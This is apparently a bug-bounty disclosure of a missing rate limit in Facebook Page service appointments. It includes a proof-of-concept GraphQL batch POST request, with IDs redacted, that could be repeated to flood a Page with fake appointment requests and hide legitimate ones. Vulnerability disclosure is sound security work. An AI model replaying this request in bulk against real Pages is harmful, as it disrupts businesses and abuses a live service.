[Facebook] Disable Service Appointments
A hacker could have used missing rate limit in setting up Appointments for a Service created by a Page and hide the legit Appointments.
POC -
A Batch GraphQL request going to -
=======================================================================
POST /api/graphqlbatch/?dpr=1 HTTP/1.1
Host: facebook.com
queries={"o0":{"doc_id":"1407026786058467","query_params":{"input":{"actor_id":XXX,"client_mutation_id":"005f85b8-8f4e-4fe5-bc15-4b49dc2f5cd7","page_id":XXX,"action":"request","service_id":"XXX","availability":"Test","consumer_name":null,"general_info":"","more_info":"Test","referrer":"service_menu","referrer_surface":"page","prior_referrer":null,"prior_referrer_surface":null,"session_id":"c1a2ecb170634f5f4194885db84d5fd6"}}}}
=======================================================================